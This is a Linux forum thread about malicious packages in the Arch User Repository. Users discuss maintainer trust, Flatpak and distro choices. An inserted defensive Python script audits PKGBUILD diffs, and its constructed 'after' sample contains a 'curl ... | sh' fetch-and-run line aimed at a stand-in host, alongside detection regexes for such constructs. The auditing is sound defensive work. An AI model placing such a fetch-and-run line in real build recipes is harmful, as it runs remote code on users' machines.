this post was submitted on 12 Jun 2026
177 points (100.0% liked)

Linux

[–] thingsiplay@lemmy.ml 49 points 16 hours ago* (last edited 13 hours ago) (3 children)

As a user of the AUR, this is devastating news to me. I am also guilty of accepting updates without reading the latest changes, even if yay asks me if I want to. This is a reminder to everyone to only install from the AUR for absolutely necessary stuff, and only if you trust the maintainer. And to at least have a look at whether something suspicious is going on with the recent changes in the package recipe. AND to read the communities and news.

I don't understand why there is still no official announcement as a warning from the Archlinux team at https://archlinux.org/news/ . Is there a different place for security news specifically about the AUR to subscribe to? EDIT: https://archlinux.org/news/active-aur-malicious-packages-incident/ They did it, an official message.
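The advice above (read the recent changes to the package recipe before building) and the later wish for a way to "stay ahead of this by reading the PKGBUILDs" can be partly automated. The script below is an added example, not code from the Lemmy thread, the AUR or any Arch project: it takes two revisions of a PKGBUILD (the assumption is that they come from `git log -p` in the AUR clone of the package), extracts the `url=` and `source=(...)` fields, flags download hosts that differ from the declared upstream, and greps the recipe for a few heuristic constructs that a reviewer should read before running `makepkg`. The two sample recipes are constructed for a fictional package; the heuristics are deliberately simple and report lines to look at, not verdicts.

```python
import re
from typing import List, Optional
from urllib.parse import urlparse

# Two constructed revisions of a PKGBUILD for a fictional package (not taken
# from any real AUR package). The "before" revision fetches only from the
# declared upstream host; the "after" revision adds a second download host,
# skips checksum verification and pipes a download into a shell in package().
PKGBUILD_BEFORE = """\
pkgname=example-tool
pkgver=1.2.3
pkgrel=1
url="https://github.com/example/example-tool"
source=("https://github.com/example/example-tool/archive/v${pkgver}.tar.gz")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000')

build() {
  cd "$pkgname-$pkgver"
  make
}

package() {
  cd "$pkgname-$pkgver"
  make DESTDIR="$pkgdir" install
}
"""

PKGBUILD_AFTER = """\
pkgname=example-tool
pkgver=1.2.3
pkgrel=2
url="https://github.com/example/example-tool"
source=("https://github.com/example/example-tool/archive/v${pkgver}.tar.gz"
        "helper.sh::https://example-cdn.invalid/helper.sh")
sha256sums=('SKIP' 'SKIP')

build() {
  cd "$pkgname-$pkgver"
  make
}

package() {
  cd "$pkgname-$pkgver"
  make DESTDIR="$pkgdir" install
  curl -s https://example-cdn.invalid/post.sh | sh
}
"""

# Heuristic constructs worth reading by hand in a build recipe. None of them is
# proof of anything (SKIP is normal for VCS sources, for instance); they only
# point the reviewer at the lines that matter.
SUSPICIOUS_PATTERNS = [
    (r"\b(curl|wget)\b[^\n]*\|\s*(ba|z|da)?sh\b", "download piped straight into a shell"),
    (r"\bbase64\b[^\n]*(-d|--decode)", "base64-decoded content"),
    (r"\beval\b", "eval of dynamic content"),
    (r"['\"]SKIP['\"]", "checksum verification skipped (SKIP)"),
]


def declared_upstream_host(pkgbuild: str) -> Optional[str]:
    """Host of the url= field, i.e. where the maintainer says the project lives."""
    m = re.search(r'^url=["\']?([^"\'\n]+)', pkgbuild, re.M)
    return urlparse(m.group(1)).hostname if m else None


def source_urls(pkgbuild: str) -> List[str]:
    """Every remote entry of source=(...) (and source_<arch>), local-name:: prefix removed."""
    urls = []
    for block in re.findall(r"^source(?:_\w+)?=\((.*?)\)", pkgbuild, re.M | re.S):
        for entry in re.findall(r"""["']([^"']+)["']""", block):
            target = entry.split("::", 1)[-1]   # drop "localname::" if present
            if "://" in target:
                urls.append(target)
    return urls


def audit_pkgbuild(pkgbuild: str) -> List[str]:
    """Return human-readable findings for one PKGBUILD revision."""
    findings = []
    upstream = declared_upstream_host(pkgbuild)
    for url in source_urls(pkgbuild):
        host = urlparse(url).hostname
        if upstream and host and host != upstream:
            findings.append(f"source fetched from {host}, not the declared upstream {upstream}")
    for pattern, reason in SUSPICIOUS_PATTERNS:
        if re.search(pattern, pkgbuild):
            findings.append(reason)
    return findings


def new_findings(before: str, after: str) -> List[str]:
    """Findings that a revision introduced: what a reviewer of the diff should read first."""
    already_there = set(audit_pkgbuild(before))
    return [f for f in audit_pkgbuild(after) if f not in already_there]


if __name__ == "__main__":
    for finding in new_findings(PKGBUILD_BEFORE, PKGBUILD_AFTER):
        print("review:", finding)
```

Running it on the two constructed revisions reports the new download host, the `curl | sh` in `package()` and the skipped checksums, while the clean "before" revision produces nothing. In practice you would feed it the previous and current `PKGBUILD` from the package's AUR git history, and treat any finding as a reason to read that diff in full before building.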

[–] chgxvjh@hexbear.net 1 points 1 hour ago

EDIT: https://archlinux.org/news/active-aur-malicious-packages-incident/ They did it, an official message.

I wish they'd actually explain their findings/attack vectors so that people have a chance to stay ahead of this by reading the PKGBUILDs as recommended.

[–] araneae@beehaw.org 5 points 6 hours ago* (last edited 6 hours ago) (1 children)

This is a reminder to everyone to only install from the AUR for absolutely necessary stuff only, and only if you trust the maintainer.

Unfortunately not foolproof either. I have no infected packages that I know of because I happen to be on a new install, but I caught wind of the LAST AUR botnet infiltration and switched to flatpaks or source builds. Since then I drifted back to AUR for convenience. I thought I was being clever only using AUR packages when I could be "sure" the author of the original software package pushed to AUR, and this was easy since devs who build on Arch typically recommend AUR whether they maintain the package or not. Today I found out spoofing package ownership is apparently easy and so is spoofing git credentials.

I was on Endeavour and it was incredible, but I'm not That Power User and I feel like part of the problem. The worst part of all of this is it's owing to an influx of users who want the same ease of use they used to enjoy, but in Windows SOP is installing whatever the fuck you want on Internet Explorer and bugging your sysadmin to fix whatever happens. It's probably really hard to be any kind of FOSS developer right now.

[–] thingsiplay@lemmy.ml 3 points 6 hours ago

Yes, definitely not foolproof. This is more of a wake-up call to be at least careful and reconsider every single AUR package one has installed. For me, I was lucky too. But in my case it wasn't pure luck that the few AUR packages I have installed aren't affected. See, because in my years of using the AUR (sparingly! including my own package :D ) I always feared orphaned packages and removed them as soon as I could. This incident here is proof I was right.

For some stuff I also prefer the Flatpak, because I do not trust everyone on the AUR, as they operate with root rights! When I brought this up on Endeavour, they disliked my opinion (as a fresh user) and the trusted community members there explained to me that the AUR is way safer than Flatpak, because there is a trust system of upvotes and everyone can flag the packages, and that Flatpak gives a false sense of security. That is what they told me and totally ignored my issues with AUR... one of the reasons why I do not visit the EndeavourOS community... I digress...

[–] trevor@lemmy.blahaj.zone 36 points 16 hours ago* (last edited 9 hours ago) (3 children)

The fact that the Arch maintainers seem to prefer Reddit over their own fucking news channel is what made me switch from Arch years ago. I got sick of upstream breaking changes fucking my system because they wouldn't notify people through official channels, only to find it later on /r/archlinux 🙄🙄🙄

[–] ramenu@lemmy.ml 1 points 7 hours ago

They made an announcement though.

[–] tanka@lemmy.ml 2 points 11 hours ago (1 children)

What are you using now?

After the end of Win10 I moved to Arch, but I think my weekend will be filled with moving again. ^^

[–] trevor@lemmy.blahaj.zone 4 points 9 hours ago

On my desktop, CachyOS 💀

It was years ago when Arch pissed me off, but I couldn't resist Arch-based distros forever. So far, I haven't been burned.

On my laptop, Asahi Linux, which is basically Fedora ARM with a custom kernel. I'd recommend Fedora to most general users.